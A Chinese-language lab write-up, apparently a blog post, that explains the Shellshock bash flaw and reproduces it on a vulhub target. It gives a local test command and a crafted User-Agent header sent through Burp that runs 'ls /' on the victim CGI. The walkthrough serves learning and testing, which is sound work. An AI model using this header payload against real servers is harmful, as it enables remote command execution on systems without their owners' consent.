Shellshock漏洞复现

  • bash说明
  • 漏洞原理
  • 漏洞复现
    • 环境说明
    • 漏洞条件
    • 漏洞复现

bash说明

Bash是Unix shell的一种。1989年发布第一个正式版本,原先是计划用在GNU操作系统上,但能运行于大多数类Unix系统的操作系统之上。

漏洞原理

目前的Bash使用的环境变量是通过函数名称来调用的,导致漏洞出问题的是以”(){”开头定义的环境变量在命令env中解析成函数后,Bash执行未退出,而是继续解析并执行shell命令,而其核心的原因在于在输入的过滤中没有严格限制边界,也没有做出合法化的参数判断。
Bash 4.3以及之前的版本在处理某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行任意的shell命令,甚至完全控制目标系统。

漏洞复现

环境说明

  • linux(装有vulhub靶场)
  • Windows2012(攻击机)

漏洞条件

Bash <= 4.3

漏洞复现

  1. 测试Linux是否存在shellshock漏洞
    执行命令:env x='() { :;}; echo shellshocked' bash -c "echo hi",如果出现图中所示的结果就表示存在shellshock漏洞。
  2. 进入靶场,靶场的搭建可以参见我的上一篇博文:Vulhub靶场搭建
    http://#{ip}:8080/victim.cgi
  3. 打开burp,抓包,构造User-Agent,然后发送。
    User-Agent: () { :;};echo ; echo; echo $(/bin/ls /);

Shellshock漏洞复现相关推荐

  1. 详解ShellShock 漏洞复现原理,内附ShellShock的修复方法

    本篇文章适合初学ShellShock漏洞阅读,如果您已经学习过ShellShock漏洞,可以直接略过.本篇是我们悬镜安全实验室成员之一Kr0iNg's 在学习ShellShock时分享的一点心得,仅供 ...

  2. vulhub漏洞复现之bash(Shellshock CVE-2014-6271)

    Shellshock 破壳漏洞 CVE-2014-6271 1.漏洞概述: GNU Bash 4.3及之前版本在评估某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此 ...

  3. LINUX漏洞复现篇之ShellShock漏洞

    简介 ShellShock漏洞, 中文称为"破壳漏洞", 是Unix Shell中的安全漏洞 在一些网络服务器的部署中, 使用bash来处理某些请求, 允许攻击者通过低版本的bas ...

  4. bash(CVE-2014-6271) shellshock-破壳漏洞复现

    漏洞简介 破壳漏洞(shellshock),也被称为bashdoor,是广泛使用的Unix shell中的一系列安全漏洞,其中第一个漏洞于2014年9月24日被披露.许多面向互联网的服务,如一些网络服 ...

  5. vulhub漏洞复现-bash(CVE-2014-6271) shellshock-破壳漏洞

    漏洞简介 破壳漏洞(shellshock),也被称为bashdoor,是广泛使用的Unix shell中的一系列安全漏洞,其中第一个漏洞于2014年9月24日被披露.许多面向互联网的服务,如一些网络服 ...

  6. Linux Bash漏洞复现

    Bash是什么? Bourne Again Shell(简称BASH)是在GNU/Linux上最流行的SHELL实现,于1980年诞生,经过了几十年的进化从一个简单的终端命令行解释器演变成了和GNU系 ...

  7. 成功爬取CVE-2019-9766漏洞复现【CSDN】【1】

    代码: import requests import bs4 from bs4 import BeautifulSoup import ress = '' headers = {'user-agent ...

  8. docker逃逸漏洞复现 cve-2019-5736

    0x01 概述 2019年2月11日,runC的维护团队报告了一个新发现的漏洞,该漏洞最初由Adam Iwaniuk和Borys Poplawski发现.该漏洞编号为CVE-2019-5736,漏洞影 ...

  9. php 远程代码执行漏洞复现 cve-2019-11043

    漏洞描述 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码. 向Nginx + PHP-FPM的服务 ...

最新文章

  1. java创建对象_java 创建对象的五种方式
  2. 开源代码hosting openfoundryfrom tw
  3. CMD一键获取 所有连接过的WIFI密码
  4. php mysql三_PHP和MySQL基础教程(三)
  5. Scala教程之:PartialFunction
  6. LeetCode 1015. 可被 K 整除的最小整数(数学)
  7. android圆形头像 demo,Android图像处理之绘制圆形头像
  8. POJ-2456.Aggressivecows.(二分求解最大化最小值)
  9. eclipse.ini vm参数– eclipse.ini文件位置Mac,Windows
  10. FSM有限状态机(三段式)-Verilog实现
  11. 入行网络攻城狮的自述
  12. excel 将科学计数法的格式换成文本
  13. 深度Deepin操作系统安装Docker
  14. ims应用服务器,IMS应用
  15. ROS-Control专题:PR2的六个概念【5】
  16. 投注测试软件,手机投注软件怎么进行性能测试
  17. 2019/04/15 在调试https://blog.csdn.net/hjw2719/article/details/83473199中程序时出现的问题
  18. 浙大计算机学院考研复试上机试题,浙大计算机学院考研复试上机试题.doc
  19. 两个苹果手机怎么定位_苹果6手机一直闪白屏怎么办?苹果6手机一直闪白屏怎么办?...
  20. 计算机架构宗师Patterson与Hennessy 演讲实录,ISA指令集架构回顾——未来指令集架构方向,RISC-V与DSA

热门文章

  1. 各大电商平台API、淘宝API、1688API、拼多多API抓取商品详情数据接口
  2. 安卓APP的字体大小设置不受系统字体大小的影响
  3. 不用任何软件,批量转化图片格式
  4. 【蓝桥杯】特别数的和
  5. [python学习记录]python初步操作mysql
  6. 申请python原因_为什么很多人喜欢 Python?
  7. 安卓日历插件 calendarview使用
  8. 五行顺口溜_纳音五行口诀
  9. sharp s2 android 9,夏普AQUOS S2值得买吗?夏普S2全面深度评测
  10. alert promt confirm js 用法